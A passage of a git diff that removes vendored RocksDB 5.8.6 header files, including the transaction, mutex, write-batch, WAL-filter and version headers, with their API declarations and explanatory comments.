-  // directly).
-  // If 0, no waiting is done if a lock cannot instantly be acquired.
-  // If negative, there is no timeout and will block indefinitely when acquiring
-  // a lock.
-  //
-  // Not using a timeout can lead to deadlocks.  Currently, there
-  // is no deadlock-detection to recover from a deadlock.  While DB writes
-  // cannot deadlock with other DB writes, they can deadlock with a transaction.
-  // A negative timeout should only be used if all transactions have a small
-  // expiration set.
-  int64_t default_lock_timeout = 1000;  // 1 second
-
-  // If set, the TransactionDB will use this implemenation of a mutex and
-  // condition variable for all transaction locking instead of the default
-  // mutex/condvar implementation.
-  std::shared_ptr<TransactionDBMutexFactory> custom_mutex_factory;
-
-  // The policy for when to write the data into the DB. The default policy is to
-  // write only the committed data (WRITE_COMMITTED). The data could be written
-  // before the commit phase. The DB then needs to provide the mechanisms to
-  // tell apart committed from uncommitted data.
-  TxnDBWritePolicy write_policy = TxnDBWritePolicy::WRITE_COMMITTED;
-};
-
-struct TransactionOptions {
-  // Setting set_snapshot=true is the same as calling
-  // Transaction::SetSnapshot().
-  bool set_snapshot = false;
-
-  // Setting to true means that before acquiring locks, this transaction will
-  // check if doing so will cause a deadlock. If so, it will return with
-  // Status::Busy.  The user should retry their transaction.
-  bool deadlock_detect = false;
-
-  // TODO(agiardullo): TransactionDB does not yet support comparators that allow
-  // two non-equal keys to be equivalent.  Ie, cmp->Compare(a,b) should only
-  // return 0 if
-  // a.compare(b) returns 0.
-
-
-  // If positive, specifies the wait timeout in milliseconds when
-  // a transaction attempts to lock a key.
-  //
-  // If 0, no waiting is done if a lock cannot instantly be acquired.
-  // If negative, TransactionDBOptions::transaction_lock_timeout will be used.
-  int64_t lock_timeout = -1;
-
-  // Expiration duration in milliseconds.  If non-negative, transactions that
-  // last longer than this many milliseconds will fail to commit.  If not set,
-  // a forgotten transaction that is never committed, rolled back, or deleted
-  // will never relinquish any locks it holds.  This could prevent keys from
-  // being written by other writers.
-  int64_t expiration = -1;
-
-  // The number of traversals to make during deadlock detection.
-  int64_t deadlock_detect_depth = 50;
-
-  // The maximum number of bytes used for the write batch. 0 means no limit.
-  size_t max_write_batch_size = 0;
-};
-
-struct KeyLockInfo {
-  std::string key;
-  std::vector<TransactionID> ids;
-  bool exclusive;
-};
-
-struct DeadlockInfo {
-  TransactionID m_txn_id;
-  uint32_t m_cf_id;
-  std::string m_waiting_key;
-  bool m_exclusive;
-};
-
-struct DeadlockPath {
-  std::vector<DeadlockInfo> path;
-  bool limit_exceeded;
-
-  explicit DeadlockPath(std::vector<DeadlockInfo> path_entry)
-      : path(path_entry), limit_exceeded(false) {}
-
-  // empty path, limit exceeded constructor and default constructor
-  explicit DeadlockPath(bool limit = false) : path(0), limit_exceeded(limit) {}
-
-  bool empty() { return path.empty() && !limit_exceeded; }
-};
-
-class TransactionDB : public StackableDB {
- public:
-  // Open a TransactionDB similar to DB::Open().
-  // Internally call PrepareWrap() and WrapDB()
-  static Status Open(const Options& options,
-                     const TransactionDBOptions& txn_db_options,
-                     const std::string& dbname, TransactionDB** dbptr);
-
-  static Status Open(const DBOptions& db_options,
-                     const TransactionDBOptions& txn_db_options,
-                     const std::string& dbname,
-                     const std::vector<ColumnFamilyDescriptor>& column_families,
-                     std::vector<ColumnFamilyHandle*>* handles,
-                     TransactionDB** dbptr);
-  // The following functions are used to open a TransactionDB internally using
-  // an opened DB or StackableDB.
-  // 1. Call prepareWrap(), passing an empty std::vector<size_t> to
-  // compaction_enabled_cf_indices.
-  // 2. Open DB or Stackable DB with db_options and column_families passed to
-  // prepareWrap()
-  // Note: PrepareWrap() may change parameters, make copies before the
-  // invocation if needed.
-  // 3. Call Wrap*DB() with compaction_enabled_cf_indices in step 1 and handles
-  // of the opened DB/StackableDB in step 2
-  static void PrepareWrap(DBOptions* db_options,
-                          std::vector<ColumnFamilyDescriptor>* column_families,
-                          std::vector<size_t>* compaction_enabled_cf_indices);
-  static Status WrapDB(DB* db, const TransactionDBOptions& txn_db_options,
-                       const std::vector<size_t>& compaction_enabled_cf_indices,
-                       const std::vector<ColumnFamilyHandle*>& handles,
-                       TransactionDB** dbptr);
-  static Status WrapStackableDB(
-      StackableDB* db, const TransactionDBOptions& txn_db_options,
-      const std::vector<size_t>& compaction_enabled_cf_indices,
-      const std::vector<ColumnFamilyHandle*>& handles, TransactionDB** dbptr);
-  ~TransactionDB() override {}
-
-  // Starts a new Transaction.
-  //
-  // Caller is responsible for deleting the returned transaction when no
-  // longer needed.
-  //
-  // If old_txn is not null, BeginTransaction will reuse this Transaction
-  // handle instead of allocating a new one.  This is an optimization to avoid
-  // extra allocations when repeatedly creating transactions.
-  virtual Transaction* BeginTransaction(
-      const WriteOptions& write_options,
-      const TransactionOptions& txn_options = TransactionOptions(),
-      Transaction* old_txn = nullptr) = 0;
-
-  virtual Transaction* GetTransactionByName(const TransactionName& name) = 0;
-  virtual void GetAllPreparedTransactions(std::vector<Transaction*>* trans) = 0;
-
-  // Returns set of all locks held.
-  //
-  // The mapping is column family id -> KeyLockInfo
-  virtual std::unordered_multimap<uint32_t, KeyLockInfo>
-  GetLockStatusData() = 0;
-  virtual std::vector<DeadlockPath> GetDeadlockInfoBuffer() = 0;
-  virtual void SetDeadlockInfoBufferSize(uint32_t target_size) = 0;
-
- protected:
-  // To Create an TransactionDB, call Open()
-  explicit TransactionDB(DB* db) : StackableDB(db) {}
-
- private:
-  // No copying allowed
-  TransactionDB(const TransactionDB&);
-  void operator=(const TransactionDB&);
-};
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/include/rocksdb/utilities/transaction_db_mutex.h b/thirdparty/rocksdb/include/rocksdb/utilities/transaction_db_mutex.h
deleted file mode 100644
index df59e7a..0000000
--- a/thirdparty/rocksdb/include/rocksdb/utilities/transaction_db_mutex.h
+++ /dev/null
@@ -1,92 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-#ifndef ROCKSDB_LITE
-
-#include <memory>
-
-#include "rocksdb/status.h"
-
-namespace rocksdb {
-
-// TransactionDBMutex and TransactionDBCondVar APIs allows applications to
-// implement custom mutexes and condition variables to be used by a
-// TransactionDB when locking keys.
-//
-// To open a TransactionDB with a custom TransactionDBMutexFactory, set
-// TransactionDBOptions.custom_mutex_factory.
-
-class TransactionDBMutex {
- public:
-  virtual ~TransactionDBMutex() {}
-
-  // Attempt to acquire lock.  Return OK on success, or other Status on failure.
-  // If returned status is OK, TransactionDB will eventually call UnLock().
-  virtual Status Lock() = 0;
-
-  // Attempt to acquire lock.  If timeout is non-negative, operation may be
-  // failed after this many microseconds.
-  // Returns OK on success,
-  //         TimedOut if timed out,
-  //         or other Status on failure.
-  // If returned status is OK, TransactionDB will eventually call UnLock().
-  virtual Status TryLockFor(int64_t timeout_time) = 0;
-
-  // Unlock Mutex that was successfully locked by Lock() or TryLockUntil()
-  virtual void UnLock() = 0;
-};
-
-class TransactionDBCondVar {
- public:
-  virtual ~TransactionDBCondVar() {}
-
-  // Block current thread until condition variable is notified by a call to
-  // Notify() or NotifyAll().  Wait() will be called with mutex locked.
-  // Returns OK if notified.
-  // Returns non-OK if TransactionDB should stop waiting and fail the operation.
-  // May return OK spuriously even if not notified.
-  virtual Status Wait(std::shared_ptr<TransactionDBMutex> mutex) = 0;
-
-  // Block current thread until condition variable is notified by a call to
-  // Notify() or NotifyAll(), or if the timeout is reached.
-  // Wait() will be called with mutex locked.
-  //
-  // If timeout is non-negative, operation should be failed after this many
-  // microseconds.
-  // If implementing a custom version of this class, the implementation may
-  // choose to ignore the timeout.
-  //
-  // Returns OK if notified.
-  // Returns TimedOut if timeout is reached.
-  // Returns other status if TransactionDB should otherwis stop waiting and
-  //  fail the operation.
-  // May return OK spuriously even if not notified.
-  virtual Status WaitFor(std::shared_ptr<TransactionDBMutex> mutex,
-                         int64_t timeout_time) = 0;
-
-  // If any threads are waiting on *this, unblock at least one of the
-  // waiting threads.
-  virtual void Notify() = 0;
-
-  // Unblocks all threads waiting on *this.
-  virtual void NotifyAll() = 0;
-};
-
-// Factory class that can allocate mutexes and condition variables.
-class TransactionDBMutexFactory {
- public:
-  // Create a TransactionDBMutex object.
-  virtual std::shared_ptr<TransactionDBMutex> AllocateMutex() = 0;
-
-  // Create a TransactionDBCondVar object.
-  virtual std::shared_ptr<TransactionDBCondVar> AllocateCondVar() = 0;
-
-  virtual ~TransactionDBMutexFactory() {}
-};
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/include/rocksdb/utilities/utility_db.h b/thirdparty/rocksdb/include/rocksdb/utilities/utility_db.h
deleted file mode 100644
index a34a638..0000000
--- a/thirdparty/rocksdb/include/rocksdb/utilities/utility_db.h
+++ /dev/null
@@ -1,35 +0,0 @@
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-#ifndef ROCKSDB_LITE
-#include <vector>
-#include <string>
-
-#include "rocksdb/utilities/stackable_db.h"
-#include "rocksdb/utilities/db_ttl.h"
-#include "rocksdb/db.h"
-
-namespace rocksdb {
-
-// Please don't use this class. It's deprecated
-class UtilityDB {
- public:
-  // This function is here only for backwards compatibility. Please use the
-  // functions defined in DBWithTTl (rocksdb/utilities/db_ttl.h)
-  // (deprecated)
-#if defined(__GNUC__) || defined(__clang__)
-  __attribute__((deprecated))
-#elif _WIN32
-   __declspec(deprecated)
-#endif
-    static Status OpenTtlDB(const Options& options,
-                                                      const std::string& name,
-                                                      StackableDB** dbptr,
-                                                      int32_t ttl = 0,
-                                                      bool read_only = false);
-};
-
-} //  namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/include/rocksdb/utilities/write_batch_with_index.h b/thirdparty/rocksdb/include/rocksdb/utilities/write_batch_with_index.h
deleted file mode 100644
index 24d8f30..0000000
--- a/thirdparty/rocksdb/include/rocksdb/utilities/write_batch_with_index.h
+++ /dev/null
@@ -1,235 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// A WriteBatchWithIndex with a binary searchable index built for all the keys
-// inserted.
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include <memory>
-#include <string>
-
-#include "rocksdb/comparator.h"
-#include "rocksdb/iterator.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/status.h"
-#include "rocksdb/write_batch.h"
-#include "rocksdb/write_batch_base.h"
-
-namespace rocksdb {
-
-class ColumnFamilyHandle;
-class Comparator;
-class DB;
-struct ReadOptions;
-struct DBOptions;
-
-enum WriteType {
-  kPutRecord,
-  kMergeRecord,
-  kDeleteRecord,
-  kSingleDeleteRecord,
-  kDeleteRangeRecord,
-  kLogDataRecord,
-  kXIDRecord,
-};
-
-// an entry for Put, Merge, Delete, or SingleDelete entry for write batches.
-// Used in WBWIIterator.
-struct WriteEntry {
-  WriteType type;
-  Slice key;
-  Slice value;
-};
-
-// Iterator of one column family out of a WriteBatchWithIndex.
-class WBWIIterator {
- public:
-  virtual ~WBWIIterator() {}
-
-  virtual bool Valid() const = 0;
-
-  virtual void SeekToFirst() = 0;
-
-  virtual void SeekToLast() = 0;
-
-  virtual void Seek(const Slice& key) = 0;
-
-  virtual void SeekForPrev(const Slice& key) = 0;
-
-  virtual void Next() = 0;
-
-  virtual void Prev() = 0;
-
-  // the return WriteEntry is only valid until the next mutation of
-  // WriteBatchWithIndex
-  virtual WriteEntry Entry() const = 0;
-
-  virtual Status status() const = 0;
-};
-
-// A WriteBatchWithIndex with a binary searchable index built for all the keys
-// inserted.
-// In Put(), Merge() Delete(), or SingleDelete(), the same function of the
-// wrapped will be called. At the same time, indexes will be built.
-// By calling GetWriteBatch(), a user will get the WriteBatch for the data
-// they inserted, which can be used for DB::Write().
-// A user can call NewIterator() to create an iterator.
-class WriteBatchWithIndex : public WriteBatchBase {
- public:
-  // backup_index_comparator: the backup comparator used to compare keys
-  // within the same column family, if column family is not given in the
-  // interface, or we can't find a column family from the column family handle
-  // passed in, backup_index_comparator will be used for the column family.
-  // reserved_bytes: reserved bytes in underlying WriteBatch
-  // max_bytes: maximum size of underlying WriteBatch in bytes
-  // overwrite_key: if true, overwrite the key in the index when inserting
-  //                the same key as previously, so iterator will never
-  //                show two entries with the same key.
-  explicit WriteBatchWithIndex(
-      const Comparator* backup_index_comparator = BytewiseComparator(),
-      size_t reserved_bytes = 0, bool overwrite_key = false,
-      size_t max_bytes = 0);
-
-  ~WriteBatchWithIndex() override;
-
-  using WriteBatchBase::Put;
-  Status Put(ColumnFamilyHandle* column_family, const Slice& key,
-             const Slice& value) override;
-
-  Status Put(const Slice& key, const Slice& value) override;
-
-  using WriteBatchBase::Merge;
-  Status Merge(ColumnFamilyHandle* column_family, const Slice& key,
-               const Slice& value) override;
-
-  Status Merge(const Slice& key, const Slice& value) override;
-
-  using WriteBatchBase::Delete;
-  Status Delete(ColumnFamilyHandle* column_family, const Slice& key) override;
-  Status Delete(const Slice& key) override;
-
-  using WriteBatchBase::SingleDelete;
-  Status SingleDelete(ColumnFamilyHandle* column_family,
-                      const Slice& key) override;
-  Status SingleDelete(const Slice& key) override;
-
-  using WriteBatchBase::DeleteRange;
-  Status DeleteRange(ColumnFamilyHandle* column_family, const Slice& begin_key,
-                     const Slice& end_key) override;
-  Status DeleteRange(const Slice& begin_key, const Slice& end_key) override;
-
-  using WriteBatchBase::PutLogData;
-  Status PutLogData(const Slice& blob) override;
-
-  using WriteBatchBase::Clear;
-  void Clear() override;
-
-  using WriteBatchBase::GetWriteBatch;
-  WriteBatch* GetWriteBatch() override;
-
-  // Create an iterator of a column family. User can call iterator.Seek() to
-  // search to the next entry of or after a key. Keys will be iterated in the
-  // order given by index_comparator. For multiple updates on the same key,
-  // each update will be returned as a separate entry, in the order of update
-  // time.
-  //
-  // The returned iterator should be deleted by the caller.
-  WBWIIterator* NewIterator(ColumnFamilyHandle* column_family);
-  // Create an iterator of the default column family.
-  WBWIIterator* NewIterator();
-
-  // Will create a new Iterator that will use WBWIIterator as a delta and
-  // base_iterator as base.
-  //
-  // This function is only supported if the WriteBatchWithIndex was
-  // constructed with overwrite_key=true.
-  //
-  // The returned iterator should be deleted by the caller.
-  // The base_iterator is now 'owned' by the returned iterator. Deleting the
-  // returned iterator will also delete the base_iterator.
-  Iterator* NewIteratorWithBase(ColumnFamilyHandle* column_family,
-                                Iterator* base_iterator);
-  // default column family
-  Iterator* NewIteratorWithBase(Iterator* base_iterator);
-
-  // Similar to DB::Get() but will only read the key from this batch.
-  // If the batch does not have enough data to resolve Merge operations,
-  // MergeInProgress status may be returned.
-  Status GetFromBatch(ColumnFamilyHandle* column_family,
-                      const DBOptions& options, const Slice& key,
-                      std::string* value);
-
-  // Similar to previous function but does not require a column_family.
-  // Note:  An InvalidArgument status will be returned if there are any Merge
-  // operators for this key.  Use previous method instead.
-  Status GetFromBatch(const DBOptions& options, const Slice& key,
-                      std::string* value) {
-    return GetFromBatch(nullptr, options, key, value);
-  }
-
-  // Similar to DB::Get() but will also read writes from this batch.
-  //
-  // This function will query both this batch and the DB and then merge
-  // the results using the DB's merge operator (if the batch contains any
-  // merge requests).
-  //
-  // Setting read_options.snapshot will affect what is read from the DB
-  // but will NOT change which keys are read from the batch (the keys in
-  // this batch do not yet belong to any snapshot and will be fetched
-  // regardless).
-  Status GetFromBatchAndDB(DB* db, const ReadOptions& read_options,
-                           const Slice& key, std::string* value);
-
-  // An overload of the the above method that receives a PinnableSlice
-  Status GetFromBatchAndDB(DB* db, const ReadOptions& read_options,
-                           const Slice& key, PinnableSlice* value);
-
-  Status GetFromBatchAndDB(DB* db, const ReadOptions& read_options,
-                           ColumnFamilyHandle* column_family, const Slice& key,
-                           std::string* value);
-
-  // An overload of the the above method that receives a PinnableSlice
-  Status GetFromBatchAndDB(DB* db, const ReadOptions& read_options,
-                           ColumnFamilyHandle* column_family, const Slice& key,
-                           PinnableSlice* value);
-
-  // Records the state of the batch for future calls to RollbackToSavePoint().
-  // May be called multiple times to set multiple save points.
-  void SetSavePoint() override;
-
-  // Remove all entries in this batch (Put, Merge, Delete, SingleDelete,
-  // PutLogData) since the most recent call to SetSavePoint() and removes the
-  // most recent save point.
-  // If there is no previous call to SetSavePoint(), behaves the same as
-  // Clear().
-  //
-  // Calling RollbackToSavePoint invalidates any open iterators on this batch.
-  //
-  // Returns Status::OK() on success,
-  //         Status::NotFound() if no previous call to SetSavePoint(),
-  //         or other Status on corruption.
-  Status RollbackToSavePoint() override;
-
-  // Pop the most recent save point.
-  // If there is no previous call to SetSavePoint(), Status::NotFound()
-  // will be returned.
-  // Otherwise returns Status::OK().
-  Status PopSavePoint() override;
-
-  void SetMaxBytes(size_t max_bytes) override;
-
- private:
-  struct Rep;
-  std::unique_ptr<Rep> rep;
-};
-
-}  // namespace rocksdb
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/include/rocksdb/version.h b/thirdparty/rocksdb/include/rocksdb/version.h
deleted file mode 100644
index b48732d..0000000
--- a/thirdparty/rocksdb/include/rocksdb/version.h
+++ /dev/null
@@ -1,16 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#pragma once
-
-#define ROCKSDB_MAJOR 5
-#define ROCKSDB_MINOR 8
-#define ROCKSDB_PATCH 6
-
-// Do not use these. We made the mistake of declaring macros starting with
-// double underscore. Now we have to live with our choice. We'll deprecate these
-// at some point
-#define __ROCKSDB_MAJOR__ ROCKSDB_MAJOR
-#define __ROCKSDB_MINOR__ ROCKSDB_MINOR
-#define __ROCKSDB_PATCH__ ROCKSDB_PATCH
diff --git a/thirdparty/rocksdb/include/rocksdb/wal_filter.h b/thirdparty/rocksdb/include/rocksdb/wal_filter.h
deleted file mode 100644
index 686fa49..0000000
--- a/thirdparty/rocksdb/include/rocksdb/wal_filter.h
+++ /dev/null
@@ -1,101 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-#include <string>
-#include <map>
-
-namespace rocksdb {
-
-class WriteBatch;
-
-// WALFilter allows an application to inspect write-ahead-log (WAL)
-// records or modify their processing on recovery.
-// Please see the details below.
-class WalFilter {
- public:
-  enum class WalProcessingOption {
-    // Continue processing as usual
-    kContinueProcessing = 0,
-    // Ignore the current record but continue processing of log(s)
-    kIgnoreCurrentRecord = 1,
-    // Stop replay of logs and discard logs
-    // Logs won't be replayed on subsequent recovery
-    kStopReplay = 2,
-    // Corrupted record detected by filter
-    kCorruptedRecord = 3,
-    // Marker for enum count
-    kWalProcessingOptionMax = 4
-  };
-
-  virtual ~WalFilter() {}
-
-  // Provide ColumnFamily->LogNumber map to filter
-  // so that filter can determine whether a log number applies to a given 
-  // column family (i.e. that log hasn't been flushed to SST already for the
-  // column family).
-  // We also pass in name->id map as only name is known during
-  // recovery (as handles are opened post-recovery).
-  // while write batch callbacks happen in terms of column family id.
-  //
-  // @params cf_lognumber_map column_family_id to lognumber map
-  // @params cf_name_id_map   column_family_name to column_family_id map
-
-  virtual void ColumnFamilyLogNumberMap(
-    const std::map<uint32_t, uint64_t>& cf_lognumber_map,
-    const std::map<std::string, uint32_t>& cf_name_id_map) {}
-
-  // LogRecord is invoked for each log record encountered for all the logs
-  // during replay on logs on recovery. This method can be used to:
-  //  * inspect the record (using the batch parameter)
-  //  * ignoring current record
-  //    (by returning WalProcessingOption::kIgnoreCurrentRecord)
-  //  * reporting corrupted record
-  //    (by returning WalProcessingOption::kCorruptedRecord)
-  //  * stop log replay
-  //    (by returning kStop replay) - please note that this implies
-  //    discarding the logs from current record onwards.
-  //
-  // @params log_number     log_number of the current log.
-  //                        Filter might use this to determine if the log
-  //                        record is applicable to a certain column family.
-  // @params log_file_name  log file name - only for informational purposes
-  // @params batch          batch encountered in the log during recovery
-  // @params new_batch      new_batch to populate if filter wants to change
-  //                        the batch (for example to filter some records out,
-  //                        or alter some records).
-  //                        Please note that the new batch MUST NOT contain
-  //                        more records than original, else recovery would
-  //                        be failed.
-  // @params batch_changed  Whether batch was changed by the filter.
-  //                        It must be set to true if new_batch was populated,
-  //                        else new_batch has no effect.
-  // @returns               Processing option for the current record.
-  //                        Please see WalProcessingOption enum above for
-  //                        details.
-  virtual WalProcessingOption LogRecordFound(unsigned long long log_number,
-                                        const std::string& log_file_name,
-                                        const WriteBatch& batch,
-                                        WriteBatch* new_batch,
-                                        bool* batch_changed) {
-    // Default implementation falls back to older function for compatibility
-    return LogRecord(batch, new_batch, batch_changed);
-  }
-
-  // Please see the comments for LogRecord above. This function is for 
-  // compatibility only and contains a subset of parameters. 
-  // New code should use the function above.
-  virtual WalProcessingOption LogRecord(const WriteBatch& batch,
-                                        WriteBatch* new_batch,
-                                        bool* batch_changed) const {
-    return WalProcessingOption::kContinueProcessing;
-  }
-
-  // Returns a name that identifies this WAL filter.
-  // The name will be printed to LOG file on start up for diagnosis.
-  virtual const char* Name() const = 0;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/include/rocksdb/write_batch.h b/thirdparty/rocksdb/include/rocksdb/write_batch.h
deleted file mode 100644
index 336391e..0000000
--- a/thirdparty/rocksdb/include/rocksdb/write_batch.h
+++ /dev/null
@@ -1,350 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// WriteBatch holds a collection of updates to apply atomically to a DB.
-//
-// The updates are applied in the order in which they are added
-// to the WriteBatch.  For example, the value of "key" will be "v3"
-// after the following batch is written:
-//
-//    batch.Put("key", "v1");
-//    batch.Delete("key");
-//    batch.Put("key", "v2");
-//    batch.Put("key", "v3");
-//
-// Multiple threads can invoke const methods on a WriteBatch without
-// external synchronization, but if any of the threads may call a
-// non-const method, all threads accessing the same WriteBatch must use
-// external synchronization.
-
-#ifndef STORAGE_ROCKSDB_INCLUDE_WRITE_BATCH_H_
-#define STORAGE_ROCKSDB_INCLUDE_WRITE_BATCH_H_
-
-#include <atomic>
-#include <stack>
-#include <string>
-#include <stdint.h>
-#include "rocksdb/status.h"
-#include "rocksdb/write_batch_base.h"
-
-namespace rocksdb {
-
-class Slice;
-class ColumnFamilyHandle;
-struct SavePoints;
-struct SliceParts;
-
-struct SavePoint {
-  size_t size;  // size of rep_
-  int count;    // count of elements in rep_
-  uint32_t content_flags;
-
-  SavePoint() : size(0), count(0), content_flags(0) {}
-
-  SavePoint(size_t _size, int _count, uint32_t _flags)
-      : size(_size), count(_count), content_flags(_flags) {}
-
-  void clear() {
-    size = 0;
-    count = 0;
-    content_flags = 0;
-  }
-
-  bool is_cleared() const { return (size | count | content_flags) == 0; }
-};
-
-class WriteBatch : public WriteBatchBase {
- public:
-  explicit WriteBatch(size_t reserved_bytes = 0, size_t max_bytes = 0);
-  ~WriteBatch() override;
-
-  using WriteBatchBase::Put;
-  // Store the mapping "key->value" in the database.
-  Status Put(ColumnFamilyHandle* column_family, const Slice& key,
-             const Slice& value) override;
-  Status Put(const Slice& key, const Slice& value) override {
-    return Put(nullptr, key, value);
-  }
-
-  // Variant of Put() that gathers output like writev(2).  The key and value
-  // that will be written to the database are concatenations of arrays of
-  // slices.
-  Status Put(ColumnFamilyHandle* column_family, const SliceParts& key,
-             const SliceParts& value) override;
-  Status Put(const SliceParts& key, const SliceParts& value) override {
-    return Put(nullptr, key, value);
-  }
-
-  using WriteBatchBase::Delete;
-  // If the database contains a mapping for "key", erase it.  Else do nothing.
-  Status Delete(ColumnFamilyHandle* column_family, const Slice& key) override;
-  Status Delete(const Slice& key) override { return Delete(nullptr, key); }
-
-  // variant that takes SliceParts
-  Status Delete(ColumnFamilyHandle* column_family,
-                const SliceParts& key) override;
-  Status Delete(const SliceParts& key) override { return Delete(nullptr, key); }
-
-  using WriteBatchBase::SingleDelete;
-  // WriteBatch implementation of DB::SingleDelete().  See db.h.
-  Status SingleDelete(ColumnFamilyHandle* column_family,
-                      const Slice& key) override;
-  Status SingleDelete(const Slice& key) override {
-    return SingleDelete(nullptr, key);
-  }
-
-  // variant that takes SliceParts
-  Status SingleDelete(ColumnFamilyHandle* column_family,
-                      const SliceParts& key) override;
-  Status SingleDelete(const SliceParts& key) override {
-    return SingleDelete(nullptr, key);
-  }
-
-  using WriteBatchBase::DeleteRange;
-  // WriteBatch implementation of DB::DeleteRange().  See db.h.
-  Status DeleteRange(ColumnFamilyHandle* column_family, const Slice& begin_key,
-                     const Slice& end_key) override;
-  Status DeleteRange(const Slice& begin_key, const Slice& end_key) override {
-    return DeleteRange(nullptr, begin_key, end_key);
-  }
-
-  // variant that takes SliceParts
-  Status DeleteRange(ColumnFamilyHandle* column_family,
-                     const SliceParts& begin_key,
-                     const SliceParts& end_key) override;
-  Status DeleteRange(const SliceParts& begin_key,
-                     const SliceParts& end_key) override {
-    return DeleteRange(nullptr, begin_key, end_key);
-  }
-
-  using WriteBatchBase::Merge;
-  // Merge "value" with the existing value of "key" in the database.
-  // "key->merge(existing, value)"
-  Status Merge(ColumnFamilyHandle* column_family, const Slice& key,
-               const Slice& value) override;
-  Status Merge(const Slice& key, const Slice& value) override {
-    return Merge(nullptr, key, value);
-  }
-
-  // variant that takes SliceParts
-  Status Merge(ColumnFamilyHandle* column_family, const SliceParts& key,
-               const SliceParts& value) override;
-  Status Merge(const SliceParts& key, const SliceParts& value) override {
-    return Merge(nullptr, key, value);
-  }
-
-  using WriteBatchBase::PutLogData;
-  // Append a blob of arbitrary size to the records in this batch. The blob will
-  // be stored in the transaction log but not in any other file. In particular,
-  // it will not be persisted to the SST files. When iterating over this
-  // WriteBatch, WriteBatch::Handler::LogData will be called with the contents
-  // of the blob as it is encountered. Blobs, puts, deletes, and merges will be
-  // encountered in the same order in which they were inserted. The blob will
-  // NOT consume sequence number(s) and will NOT increase the count of the batch
-  //
-  // Example application: add timestamps to the transaction log for use in
-  // replication.
-  Status PutLogData(const Slice& blob) override;
-
-  using WriteBatchBase::Clear;
-  // Clear all updates buffered in this batch.
-  void Clear() override;
-
-  // Records the state of the batch for future calls to RollbackToSavePoint().
-  // May be called multiple times to set multiple save points.
-  void SetSavePoint() override;
-
-  // Remove all entries in this batch (Put, Merge, Delete, PutLogData) since the
-  // most recent call to SetSavePoint() and removes the most recent save point.
-  // If there is no previous call to SetSavePoint(), Status::NotFound()
-  // will be returned.
-  // Otherwise returns Status::OK().
-  Status RollbackToSavePoint() override;
-
-  // Pop the most recent save point.
-  // If there is no previous call to SetSavePoint(), Status::NotFound()
-  // will be returned.
-  // Otherwise returns Status::OK().
-  Status PopSavePoint() override;
-
-  // Support for iterating over the contents of a batch.
-  class Handler {
-   public:
-    virtual ~Handler();
-    // All handler functions in this class provide default implementations so
-    // we won't break existing clients of Handler on a source code level when
-    // adding a new member function.
-
-    // default implementation will just call Put without column family for
-    // backwards compatibility. If the column family is not default,
-    // the function is noop
-    virtual Status PutCF(uint32_t column_family_id, const Slice& key,
-                         const Slice& value) {
-      if (column_family_id == 0) {
-        // Put() historically doesn't return status. We didn't want to be
-        // backwards incompatible so we didn't change the return status
-        // (this is a public API). We do an ordinary get and return Status::OK()
-        Put(key, value);
-        return Status::OK();
-      }
-      return Status::InvalidArgument(
-          "non-default column family and PutCF not implemented");
-    }
-    virtual void Put(const Slice& /*key*/, const Slice& /*value*/) {}
-
-    virtual Status DeleteCF(uint32_t column_family_id, const Slice& key) {
-      if (column_family_id == 0) {
-        Delete(key);
-        return Status::OK();
-      }
-      return Status::InvalidArgument(
-          "non-default column family and DeleteCF not implemented");
-    }
-    virtual void Delete(const Slice& /*key*/) {}
-
-    virtual Status SingleDeleteCF(uint32_t column_family_id, const Slice& key) {
-      if (column_family_id == 0) {
-        SingleDelete(key);
-        return Status::OK();
-      }
-      return Status::InvalidArgument(
-          "non-default column family and SingleDeleteCF not implemented");
-    }
-    virtual void SingleDelete(const Slice& /*key*/) {}
-
-    virtual Status DeleteRangeCF(uint32_t column_family_id,
-                                 const Slice& begin_key, const Slice& end_key) {
-      return Status::InvalidArgument("DeleteRangeCF not implemented");
-    }
-
-    virtual Status MergeCF(uint32_t column_family_id, const Slice& key,
-                           const Slice& value) {
-      if (column_family_id == 0) {
-        Merge(key, value);
-        return Status::OK();
-      }
-      return Status::InvalidArgument(
-          "non-default column family and MergeCF not implemented");
-    }
-    virtual void Merge(const Slice& /*key*/, const Slice& /*value*/) {}
-
-    virtual Status PutBlobIndexCF(uint32_t /*column_family_id*/,
-                                  const Slice& /*key*/,
-                                  const Slice& /*value*/) {
-      return Status::InvalidArgument("PutBlobIndexCF not implemented");
-    }
-
-    // The default implementation of LogData does nothing.
-    virtual void LogData(const Slice& blob);
-
